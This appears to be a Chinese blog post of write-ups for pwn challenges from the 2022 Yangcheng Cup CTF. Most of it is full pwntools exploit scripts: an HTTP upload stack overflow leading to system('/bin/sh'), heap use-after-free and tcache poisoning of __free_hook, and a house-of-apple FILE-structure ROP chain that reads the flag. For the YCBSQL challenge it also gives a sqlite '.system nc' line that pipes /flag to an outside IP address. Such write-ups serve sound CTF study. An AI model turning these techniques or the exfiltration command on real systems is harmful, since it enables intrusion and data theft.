2022羊城杯pwn wp

最新推荐文章于 2023-11-21 12:31:55 发布
最新推荐文章于 2023-11-21 12:31:55 发布
阅读量829 收藏 4
点赞数 2
分类专栏: wp 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Invin_cible/article/details/126693348
版权

YCBSQL

远程是上传一个sql文件,题目提示用nc带出flag。

优先考虑sqlite自带的.system函数(抱着试一试的想法),然后找web手要了个vps监听,莫名其妙就出了。

sql文件内容:

.system nc 1.117.171.248 9997 </flag

fakeNoOutput

是个httpd。最后三分钟做出来了。

协议格式逆了半天,有个栈溢出在upload里,触发溢出的条件:

  • HTTP_SERVER1_token是系统随机生成的,得写对。token记得用\x00截断

  • 开头得有个POST 。

  • 中间得有空格。

  • 得有一个/upload。

  • 后面输入字节数由报文格式里的content-length确定,否则会一直陷入死循环。

然后就是用程序自带的函数泄露got表里的libc地址:

~2@G2T@3%E_9CCR_3(VAHC5

控制参数a1即可,然后就是重回start后调用system。

这里还有几点需要注意:

  • 重回之后得重新输入HTTP_SERVER1_token

  • one_gadget都失效,用system提权,由于payload中不能出现\x00(差点把我坑了),所以我们用;隔断,写入/bin/sh;即可

from pwn import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
context.arch='i386'
r = process('/mnt/hgfs/ubuntu/ycb/fakeNoOutput/fakeNoOutput')
r = remote('tcp.dasc.buuoj.cn',26595)
elf = ELF('/mnt/hgfs/ubuntu/ycb/fakeNoOutput/fakeNoOutput')
libc = ELF('/mnt/hgfs/ubuntu/ycb/fakeNoOutput/libc.so.6')



payload = b'POST /upload .jsp HTTP/1.1\r\nHTTP_SERVER1_token:wR5qH796Ky8D03r2W7syLB7406e30xP7\x00Accept: */*\r\nAccept-Language: zh-cn\r\nContent-Type: multipart/form-data; boundary=---------------------------7da29f2d890386\r\nHost: abc.com\r\nContent-Length: 5376\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n'


r.sendline(payload)
payload2 = b"Content: filename=aaaa"
r.sendline(payload2)

fwrite =  0x8049724
leave_ret = 0x08049365
fprintf = 0x8049740
pop_ebx = 0x08049022
ok = 0x80496A1


payload3 = b''
payload3 = payload3.ljust(0x1044,b'a')+p32(ok)+p32(0x80492E0)+p32(elf.got["strstr"])
payload3 = payload3.ljust(0x14e8,b'a')

r.sendline(payload3)
libc_base = u32(r.recvuntil(b'\xf7')[-4:])-libc.sym["strstr"]
# r.sendline(b'a'*47+b'\0')
# gdb.attach(r)
payload = b'POST /upload .jsp HTTP/1.1\r\nHTTP_SERVER1_token:5lnPP74OkC4N9U8smBU812Smk1XxvRBJ\x00Accept: */*\r\nAccept-Language: zh-cn\r\nContent-Type: multipart/form-data; boundary=---------------------------7da29f2d890386\r\nHost: abc.com\r\nContent-Length: 5376\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n'
r.sendline(payload)
payload2 = b"Content: filename=aaaa"
r.sendline(payload2)

system_addr = libc_base+libc.sym["system"]

payload3 = b'/bin/sh;'
payload3 = payload3.ljust(0x1044,b'a')+p32(system_addr)+p32(0xdeadbeef)+p32(0x804D1A0)
payload3 = payload3.ljust(0x14e8,b'a')
r.sendline(payload3)

log.success("libc_base: "+hex(libc_base))
r.interactive()

Linklist

一个链表堆题

我利用的洞是unlink的时候next指针没有清空,

能够造成例如a->b->c->d unlink之后成为

a->c->d

b->c->d

不过此时b->c->d的nodenum为1,因此不好操作,唯一好利用的点就是通过delete 0xff来清空一整条链表,此时没有检查nodenum。

我申请了大小为0x10大小的内容堆块,以和结构体堆块大小一样。

然后free掉两时候,0x20大小的tcache free list就有四个堆块。

此时适当构造堆风水,可以show出heap地址,同时后续可以申请一个内容堆块到UAF的结构体堆块,提前在其他地方伪造好 fake_chunk_size(在UAF结构体堆块伪造的话,后续free掉,因为程序的操作,unsortedbin的fd指针会清零,dump不了libc基址),然后改掉UAF结构体堆块的ptr,通过delete 0xff来free掉fake chunk。然后show然后overlapping 打tcache就好。

from pwn import *
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
context.log_level = 'debug'
r = process('/mnt/hgfs/ubuntu/ycb/linklist/pwn')
r = remote('tcp.dasc.buuoj.cn',21077)
libc = ELF('/mnt/hgfs/ubuntu/ycb/linklist/libc.so.6')


def menu(choice):
    r.recvuntil("Your choice:")
    r.sendline(str(choice))

def add(size,content):
    menu(1)
    r.recvuntil(b"Size:")
    r.sendline(str(size))
    r.recvuntil("Content:")
    r.send(content)

def delete(idx,offset):
    menu(2)
    r.recvuntil(b"Index")
    r.sendline(str(idx))
    r.recvuntil(b"Input offset:")
    r.sendline(str(offset))

def link(idx1,idx2):
    menu(3)
    r.recvuntil(b"link from:")
    r.sendline(str(idx1))
    r.recvuntil(b"link to:")
    r.sendline(str(idx2))

def unlink(idx,offset):
    menu(4)
    r.recvuntil(b"Index:")
    r.sendline(str(idx))
    r.recvuntil(b"Input offset:")
    r.sendline(str(offset))


#heaplist 0x4060
#nodenum 0x40e0

# add(0x60,b'a'*0x60)#0
# add(0x60,b'b'*0x60)#1
# add(0x60,b'c'*0x60)#2
# add(0x60,b'd'*0x60)#3
# add(0x60,b'e'*0x60)#4
# add(0x60,b'f'*0x60)#5
# link(0,1)
# link(0,2)

# unlink(0,1)#1

# delete(0,1)

# add(0x60,b'a')#2
# delete(1,0xff)

add(0x10,b'a'*0x10)#0
add(0x10,b'b'*0x10)#1
add(0x10,b'c'*0x10)#2
link(0,1)
link(0,2)
unlink(0,1)
delete(1,0xff)
add(0x60,b'e'*0x60)#1
add(0x60,b'd'*0x60)#2
add(0x60,b'd'*0x60)#3
add(0x60,b'd'*0x60)#4
link(2,1)
delete(3,0)
delete(2,1)

menu(4)
r.recvuntil(b"Index:")
r.sendline(str(0))
r.recvuntil(b"Offset 1:")
heap_base = u64(r.recvuntil(b'\n')[:-1].ljust(8,b'\0'))-0x440
r.recvuntil(b"Input offset:")
r.sendline(str(1))
add(0x60,p64(0)+p64(0x4a1)+b'd'*0x50)#3
add(0x18,p64(0)+p64(0)+p64(heap_base+0x370))#5
add(0x60,b'd'*0x60)#6
add(0x60,b'd'*0x60)#7
add(0x60,b'd'*0x60)#8
add(0x60,b'd'*0x60)#9
add(0x60,b'd'*0x60)#10
add(0x60,b'd'*0x60)#11

delete(0,0xff)
add(0x50,b'a')
link(1,2)
#leak libc
menu(4)
r.recvuntil(b"Index:")
r.sendline(str(1))
libc_base = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\0'))-0x1ebbe0
r.recvuntil(b"Input offset:")
r.sendline(str(1))
delete(3,0)
delete(4,0)
free_hook = libc_base+libc.sym["__free_hook"]
one_gadget = libc_base+0xe6c81
add(0x70,b'a')
add(0x70,p64(free_hook)*14)
add(0x60,b'a')
add(0x60,p64(one_gadget))

# gdb.attach(r)
delete(1,0)
# unlink(2,3)


log.success("libc_base: "+hex(libc_base))
log.success("heap_base: "+hex(heap_base))
r.interactive()

Dream

最垃圾的板子题,解得人最少。

Glibc 2.32,白给的UAF,除了show给了一个魔改tea加密,甚至还提供了perror这种调用stderr的函数

用house of emma本地通了三小时,远程咋都不通,不然早一血了。

尝试过换libc版本,爆破tls,很奇怪就是不通。

然后换house of apple打通了。

from decimal import setcontext
from pickle import TRUE
from pwn import *
import ctypes
from ctypes import c_int, c_uint32
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
# context.log_level = 'debug'
context.arch='amd64'
r = process('/mnt/hgfs/ubuntu/ycb/dream/dream')
r = remote('tcp.dasc.buuoj.cn',28072)
libc = ELF('/mnt/hgfs/ubuntu/ycb/dream/libc-2.32.so')

global DELTA 

DELTA = 0x9e3779b9
DELTA2 = 0x61C88647

def btea(v, n, key):
    # assert len(key) == 4
    # assert len(v) == 2
    
    key = [c_uint32(i) for i in key]
    v = [c_uint32(i) for i in v]
    
    if n > 1:
        rounds = 6 + 52//n
        sum = c_uint32(0)
        z = v[n-1]
        
        while True:
            sum.value -= DELTA2
            e = (sum.value >> 2) & 3
            
            for p in range(n-1):
                y = v[p+1]
                MX = ((((z.value>>7)^(y.value<<3)) + ((y.value>>3)^(z.value<<4))) & 0xFFFFFFFF ^ ((sum.value^y.value) + (key[(p&3)^e].value ^ z.value)) & 0xFFFFFFFF)
                # print("MX:0x%x" % MX)
                v[p].value += MX
                z = v[p]
            p = n-1    
                
            y = v[0]
            # print(p,e,sum.value)
            # print(z.value,y.value,key[(p&3)^e].value,sum.value)
            MX = ((((z.value>>7)^(y.value<<3)) + ((y.value>>3)^(z.value<<4))) & 0xFFFFFFFF ^ ((sum.value^y.value) + (key[(p&3)^e].value ^ z.value)) & 0xFFFFFFFF)
            # print("MX Final:0x%x" % MX)
            v[n-1].value += MX
            z = v[n-1]
            
            # print("rounds:%d" % rounds)
            # print("rounds:0x%x | sum:0x%x | e:0x%x | y:0x%x | z:0x%x" % (rounds, sum.value, e, y.value, z.value))
            rounds -= 1
            if rounds == 0:
                break
    elif n < -1:
        n = -n
        rounds = 6 + 52//n
        sum = c_uint32(rounds*DELTA)
        y = v[0]
        while True:
            e = (sum.value >> 2) & 3
            for p in range(n-1, 0, -1):
                z = v[p-1]
                v[p].value -= (((z.value>>7^y.value<<3) + (y.value>>3^z.value<<4)) ^ ((sum.value^y.value) + (key[(p&3)^e].value ^ z.value)))
                y = v[p]
            p = 0

            z = v[n-1]
            v[0].value -= (((z.value>>7^y.value<<3) + (y.value>>3^z.value<<4)) ^ ((sum.value^y.value) + (key[(p&3)^e].value ^ z.value)))
            y = v[0]

            sum.value -= DELTA

            rounds -= 1
            if rounds == 0:
                break
            
    ret = [i.value for i in v]
    return ret

# r = btea([1,2, 3,4], 4, [2,2,3,4])


def menu(choice):
    r.recvuntil(b"choice: ")
    r.sendline(str(choice))

def add(idx,size,content):
    menu(1)
    r.recvuntil(b"Give me a dream ID: ")
    r.sendline(str(idx))
    r.recvuntil(b"how long: ")
    r.sendline(str(size))
    r.recvuntil(b"dream: ")
    r.send(content)

def delete(idx):
    menu(2)
    r.recvuntil(b"Which dream to wake?")
    r.sendline(str(idx))

def show(idx):
    menu(4)
    r.recvuntil(b"Which dream do you want to show?")
    r.sendline(str(idx))

def edit(idx,content):
    menu(3)
    r.recvuntil(b"Which dream to make?")
    r.sendline(str(idx))
    r.recvuntil(b"dream: ")
    r.send(content)

def ROL(content, key):
    tmp = bin(content)[2:].rjust(64, '0')
    return int(tmp[key:] + tmp[:key], 2)


add(0,0x420,b'a')#0
add(10,0x440,b'a')
add(11,0x480,b'a')
add(1,0x400,b'a')#1
add(2,0x470,b'a')#2
add(5,0x400,b'a')
add(3,0x430,b'a')#3
add(6,0x400,b'a')
add(4,0x440,b'a')#4
add(7,0x400,b'a')

delete(0)
delete(4)




add(8,0x450,b'a')

show(0)
data = r.recv(0x420)

ls = [u32(data[4*i:4*(i+1)]) for i in range(0x420//4)]

data2 = btea(ls, -len(ls), [9,5,2,7])


# # print(len(data2))
# print(hex(data2[0]),hex(data2[1]))
libc_base = ((data2[1]<<32)+data2[0])-0x1e3ff0
heap_base = ((data2[5]<<32)+data2[4])-0x290
delete(3)
stderr = libc_base+0x1e47a0
edit(4,p64(libc_base+0x1e4000)*2+p64(heap_base+0x1b50)+p64(stderr-0x20))
add(9,0x450,b'a')
leave_ret = libc_base + 0x000000000005591c
fake_IO_addr = heap_base + 0x290
rop_address = fake_IO_addr + 0xe0 + 0xe8 + 0x70

        # orw =  b'./flag\x00\x00'
        # orw += p64(pop_rdx_r12_ret) + p64(0) + p64(fake_IO_addr - 0x10)
        # orw += p64(pop_rdi_ret) + p64(rop_address)
        # orw += p64(pop_rsi_ret) + p64(0)
        # orw += p64(libc.sym['open'])
        # orw += p64(pop_rdi_ret) + p64(3)
        # orw += p64(pop_rsi_ret) + p64(rop_address + 0x100)
        # orw += p64(pop_rdx_r12_ret) + p64(0x50) + p64(0)
        # orw += p64(libc.sym['read'])
        # orw += p64(pop_rdi_ret) + p64(1)
        # orw += p64(pop_rsi_ret) + p64(rop_address + 0x100)
        # orw += p64(pop_rdx_r12_ret) + p64(0x50) + p64(0)
        # orw += p64(libc.sym['write'])
gadget_addr = libc_base+0x14b520+576
setcontext_addr = libc_base+libc.sym["setcontext"]+61
# payload = p64(0) + p64(leave_ret) + p64(0) + p64(stderr - 0x20)
# payload = payload.ljust(0x38, b'\x00') + p64(rop_address)
# payload = payload.ljust(0x90, b'\x00') + p64(fake_IO_addr + 0xe0)
# payload = payload.ljust(0xc8, b'\x00') + p64(libc.sym['_IO_wfile_jumps'])
# payload = payload.ljust(0xd0 + 0xe0, b'\x00') + p64(fake_IO_addr + 0xe0 + 0xe8)
# payload = payload.ljust(0xd0 + 0xe8 + 0x68, b'\x00') + p64(gadget_addr)


fake_io_addr=heap_base+0x1c40 # 浼€犵殑fake_IO缁撴瀯浣撶殑鍦板潃
next_chain = 0
fake_IO_FILE=p64(0)         #_flags=rdi
fake_IO_FILE+=p64(0)*5
fake_IO_FILE +=p64(1)+p64(0)
fake_IO_FILE +=p64(fake_io_addr+0x200-0x90)#_IO_backup_base=rdx
fake_IO_FILE +=p64(setcontext_addr)#_IO_save_end=call addr(call setcontext/system)
fake_IO_FILE = fake_IO_FILE.ljust(0x58, b'\x00')
fake_IO_FILE += p64(0)  # _chain
fake_IO_FILE = fake_IO_FILE.ljust(0x78, b'\x00')
fake_IO_FILE += p64(heap_base+0x1000)  # _lock = a writable address
fake_IO_FILE = fake_IO_FILE.ljust(0x90, b'\x00')
fake_IO_FILE +=p64(fake_io_addr+0x30)#_wide_data,rax1_addr
fake_IO_FILE = fake_IO_FILE.ljust(0xB0, b'\x00')
fake_IO_FILE += p64(0)
fake_IO_FILE = fake_IO_FILE.ljust(0xC8, b'\x00')
fake_IO_FILE += p64(libc_base+libc.sym['_IO_wfile_jumps']+0x10)  # vtable=IO_wfile_jumps+0x10
fake_IO_FILE +=p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x40)  # rax2_addr

pop_rax_addr = libc_base+0x0000000000045580
syscall_addr = libc_base+0x00000000000611ea
pop_rdi_addr = libc_base+0x000000000002858f
pop_rsi_addr = libc_base+0x000000000002ac3f
pop_rdx_r12_addr = libc_base+0x0000000000114161
# leave_ret = 



fake_IO_FILE = fake_IO_FILE.ljust(0x200,b'\0')
fake_IO_FILE+=p64(fake_io_addr+0x260)+p64(pop_rdi_addr+1)
fake_IO_FILE = fake_IO_FILE.ljust(0x250,b'\0')







rop_data = [
        pop_rax_addr,  # sys_open('flag', 0)
        2,
        pop_rdi_addr,
        heap_base+0x2050,
        syscall_addr,
    
        pop_rax_addr,  # sys_read(flag_fd, heap, 0x100)
        0,
        pop_rdi_addr,
        3,
        pop_rsi_addr,
        heap_base + 0x200,
        pop_rdx_r12_addr,
        0x200,
        0,
        syscall_addr,

        pop_rax_addr,  # sys_write(1, heap, 0x100)
        1,
        pop_rdi_addr,
        1,
        pop_rsi_addr,
        heap_base + 0x200,
        pop_rdx_r12_addr,
        0x200,
        0,
        syscall_addr
    ]

fake_IO_FILE+=flat(rop_data)
fake_IO_FILE = fake_IO_FILE.ljust(0x400,b'\0')
fake_IO_FILE+=b'./flag\x00'


# fake_IO_FILE = p64(0)*4
# fake_IO_FILE +=p64(0)
# fake_IO_FILE +=p64(0)
# fake_IO_FILE +=p64(1)+p64(0)
# fake_IO_FILE +=p64(heap_base+0xc18-0x68)#rdx
# fake_IO_FILE +=p64(setcontext_addr)#call addr
# fake_IO_FILE = fake_IO_FILE.ljust(0x58, b'\x00')
# fake_IO_FILE += p64(0)  # _chain
# fake_IO_FILE = fake_IO_FILE.ljust(0x78, b'\x00')
# fake_IO_FILE += p64(heap_base+0x200)  # _lock = writable address
# fake_IO_FILE = fake_IO_FILE.ljust(0x90, b'\x00')
# fake_IO_FILE +=p64(heap_base+0xb30) #rax1
# fake_IO_FILE = fake_IO_FILE.ljust(0xB0, b'\x00')
# fake_IO_FILE += p64(0)  # _mode = 0
# fake_IO_FILE = fake_IO_FILE.ljust(0xC8, b'\x00')
# fake_IO_FILE += p64(libc_base+libc.sym['_IO_wfile_jumps']+0x10)  # vtable=IO_wfile_jumps+0x10
# fake_IO_FILE +=p64(0)*6
# fake_IO_FILE += p64(heap_base+0xb30+0x10)  # rax2

edit(3,fake_IO_FILE)




log.success("heap_base: "+hex(heap_base))
log.success("libc_base: "+hex(libc_base))
# gdb.attach(r,'b *'+str(hex(setcontext_addr)))
menu(5)
r.interactive()
Loτυs
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN 强网2020siri 题目
09-21
PWN 强网2020siri 题目
网鼎2022白虎组题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎2022,白虎组,ctf
2020YCBCTF:2020羊城官方writeup及
03-24
20202020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
安恒pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
强网2022 pwn 赛题解析.docx
12-18
强网
水几个pwn
Stella_Leo的博客
08-24 240
author: moqizou 2020-羊城-signin 签到题目2.23的glibc add - 最多10个chunk然后会malloc(0x28)之后就是namesize结构体如下 0x10 chunk 头 0x8 1 inuse位置 0x8 buf->name_chunk 0x8 23字节的message 0x8 看上面可以溢出 然后会把该chunk指针 存入全局table view 通过判断inuse输出name和message del uaf,只清除chunk_table和name.
2022羊城wp
xjh8023的博客
09-04 1659
大赛由中共广州市委网络安全和信息化委员会办公室作为指导单位,广州市网络安全产业促进会主办,广东外语外贸大学、杭州安恒信息技术股份有限公司承办,广州市信息安全测评中心、广州互联网协会协办。 大赛以“网络安全为人民、网络安全靠人民”为主题,旨在通过竞赛的方式提高参赛选手攻防兼备的网络安全实践技能,实现以赛促学、以赛会友,加强不同院校及单位间的技术交流。
2021羊城pwn部分wp
eeeeeight的博客
09-12 6471
前言: 羊城的how2heap没做出来, rctf也爆零了, 哎, 颓了 BabyRop: 最基础的栈溢出rop链, 直接贴exp了: from pwn import * #p=process('./BabyRop') p=remote('192.168.41.23', 11000) context.log_level='debug' sh=0x804c029 system=0x80490a0 #gdb.attach(p,'b *0x804926a') p.sendline('a'*0x28+'b'*
ycb2020babypwn(unsortedbin爆破stdout泄露)
qq_33590156的博客
12-04 318
题目没有leak函数,肯定得打stdout,但是又是个2.23,有指针没清零的漏洞 在stdout-0x43的地方有0x7f的size,而且和main_arena+88很近,最后三位固定是0x5dd,所以需要爆破第二个字节的高位,概率是1/16。这应该是没leak的通用打法 然后题目是通过double free,控制堆块,修改size进unsortedbin,然后爆破fd,申请出stdout泄露libc,最后打malloc_hook和realloc去getshell。 操作 首先肯定是double free
[羊城 2020]Bytecode [UTCTF2020]babymips
寻梦&之璐
05-30 1097
文章目录查看题目python代码Z3约束脚本 查看题目 python字节码,需要把它转为python代码,如下: python代码 import dis def main(): en=[3,37,72,9,6,132] output=[101,96,23,68,112,42,107,62,96,53,176,179,98,53,67,29,41,120,60,106,51,101,178,189,101,48] print("welcome to GWHT2020") f
pwn2022 羊城 fakeNoOutput
woodwhale的博客
09-05 392
2022 羊城 fakeNoOutput
house_of_emma(2021 湖湘)
m0_63437215的博客
11-08 440
house_of_emma
2023 羊城 final
qq_61670993的博客
11-21 118
数组越界, house of force, house of husk
羊城_2020_babyre 题解
lifanxin的博客
09-09 1060
babyre题目信息考查知识题目分析WP脚本总结 题目信息   本题目来自于2020羊城的逆向题,可以在buuoj上找到题目复现。 考查知识   本题目考查的知识点有:DES/AES算法,SMC自修改代码,以及合理利用动态调试来快速解题。   关于动态调试,这里很多人可能会遇到环境问题,主要是因为题目调用了openssl的动态加密算法库,所以本地也得有一个。同时还需要注意openssl加密算法库的版本问题,该题目必须使用libcrypto.so.1.0.0。这里我给出该算法库文件 – libcrypto
house of Emma
weixin_46483787的博客
02-08 2046
前言 鸽了好久总算来复现了,由于从libc2.34开始,取消了两个常用的hook,这给我们的攻击带来了很大的困难,于是wjh找到了一种新的攻击方式,这是一种基于一条适用于 GLIBC 2.34 及以下所有版本的 IO_File 调用链进行攻击的手法。 前置知识 (一)largebin attack 见我的另一篇文章:house of pig 攻击手法详解 (二)house of kiwi 当程序没有显示调用exit,也不会通过主函数返回,那么以往我们使用的FSOP就无法进行了,如果此时两个hook也没法利用
2023年“羊城”网络安全大赛 Web方向题解wp
Jay17的博客
09-03 4706
2023年“羊城”网络安全大赛 Web方向题解wp
羊城2022 部分题解
weixin_51122085的博客
09-04 2197
羊城2022 部分题解
羊城2022--Writeup
m0_61596829的博客
09-06 1790
羊城2022--Writeup
2022羊城 misc 迷失幻境 wp
路baby的博客
09-05 616
misc迷失幻境( •̀ ω •́ )y 前天打了一下羊城 觉的这个题挺有意思的 所以今天再给各位兄台复现一边(里面有可莉哦)( •̀ ω •́ )y
2023 羊城 pwn
最新发布
01-02
2023年的羊城pwn比赛将是一场精彩的技术对决。作为网络安全领域的顶尖比赛之一,羊城吸引了来自全球各地的顶尖选手参与。比赛将涉及各种pwn技术,包括堆溢出、格式化字符串漏洞、内存泄露等。参赛选手需要展示出扎实的漏洞利用能力和对各种漏洞类型的深刻理解。 在比赛中,选手们将不仅需要迅速理解并攻克给定的目标程序,还要在极短的时间内快速编写出最有效的漏洞利用代码。比赛中还可能涉及到逆向工程和加密算法的挑战,综合了对系统原理和网络安全的深入理解。 对于参赛选手来说,需要具备丰富的经验和深厚的技术功底,以应对各种复杂多变的攻击场景。他们需要灵活运用各种pwn技术和工具,快速定位和利用漏洞,最大限度地获取目标系统的控制权。 羊城pwn比赛将成为一次全球顶尖网络安全专家的盛会,也将极大地推动网络安全技术的发展和创新。这场比赛将不仅展现出各选手的技术实力,也将促进国际网络安全领域的交流与合作,为推动网络安全事业的发展贡献力量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值